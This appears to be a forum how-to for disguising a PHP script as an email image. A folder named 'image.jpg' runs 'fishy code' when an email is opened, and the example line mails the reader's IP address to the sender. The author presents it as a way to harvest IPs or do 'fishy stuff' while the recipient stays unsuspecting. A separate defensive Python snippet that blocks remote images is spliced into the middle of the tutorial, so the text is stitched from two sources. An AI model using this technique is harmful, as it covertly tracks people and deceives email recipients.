In this how-to we will send an email containing an image that is served by a PHP script, which runs some fishy code before it returns the image.
What you'll need
- Apache web server with PHP
- An image (included below)
- An email account (I use Gmail)
Make a folder called "image.jpg" in your public html folder. In your "image.jpg" folder place your "image.jpg" file and your "index.php" file.
I will be using this image as an example.
The contents of your "index.php" file should be as follows:
//fishy stuff here
Where it says "//fishy stuff here" put any fishy code you want to run.
mail("email@example.com", "hax", $_SERVER['REMOTE_ADDR'] . ' : ' . $_SERVER['HTTP_X_FORWARDED_FOR']);
This emails me the IP address of the user.
Start by filling out the "to" and "subject" fields.
Click on the image icon to add an image to your email.
Click on "Web Address (URL)" and enter the address of your "image.jpg" folder, not of the image file itself. If everything is set up right, the image and a check mark should appear.
If everything went well you should see your image in the message field. Now all you need to do is send the email and wait for someone to open it.
When someone opens the email, their browser sees the image tag and requests "http://example.com/image.jpg" to get the image. Because "image.jpg" is a folder, the server runs "index.php" as if the user had visited the page. When "index.php" runs, it executes the fishy code and then sends the content back to the browser in the form of an image, which is displayed in the email so the user does not get suspicious.
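On the receiving side, the countermeasure is to keep the mail client from fetching remote content when a message is rendered. The sketch below is an added example, not code from the original how-to; the names `RemoteContentBlocker` and `sanitize` and the sample message body are assumptions made for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_ATTRS = {"src", "background", "poster"}   # attributes a client fetches on render
CSS_REMOTE = re.compile(r"url\(\s*['\"]?\s*(?:https?:)?//", re.I)

def is_remote(url):
    """True if rendering this URL contacts a server; cid: and data: stay local."""
    parts = urlparse(url.strip())
    return parts.scheme in ("http", "https") or (not parts.scheme and bool(parts.netloc))

class RemoteContentBlocker(HTMLParser):
    """Re-serialises an HTML mail body with every remote fetch disabled."""
    def __init__(self):
        super().__init__()
        self.out, self.blocked = [], []

    def handle_starttag(self, tag, attrs):
        kept = []
        for name, value in attrs:
            value = value or ""
            if (name in URL_ATTRS and is_remote(value)) or \
               (name == "style" and CSS_REMOTE.search(value)):
                # The decision ignores the path: a ".jpg" ending says nothing
                # about what the server runs when the URL is requested.
                self.blocked.append(value)
                name = "data-blocked-" + name
            kept.append(f'{name}="{escape(value)}"')
        self.out.append("<" + " ".join([tag] + kept) + ">")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize(html_body):
    """Return (safe_html, list_of_blocked_values) for one message body."""
    parser = RemoteContentBlocker()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.blocked

# Constructed sample body: a remote image, an inline (cid:) attachment, a CSS background.
SAMPLE = ('<p>Hi &amp; welcome</p><img src="http://example.com/image.jpg" alt="pic">'
          '<img src="cid:logo@local"><td style="background:url(//example.com/image.jpg)">x</td>')

if __name__ == "__main__":
    clean, blocked = sanitize(SAMPLE)
    print(clean)
    print("blocked:", blocked)
```

Images attached to the message itself (`cid:`) still display, while anything that would make the reader's client contact a server is kept only as an inert `data-blocked-*` attribute.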
This can be used to get IP addresses or to do fishy stuff. Thank you for reading my how-to! I am new to this site and would appreciate any feedback in the comments below.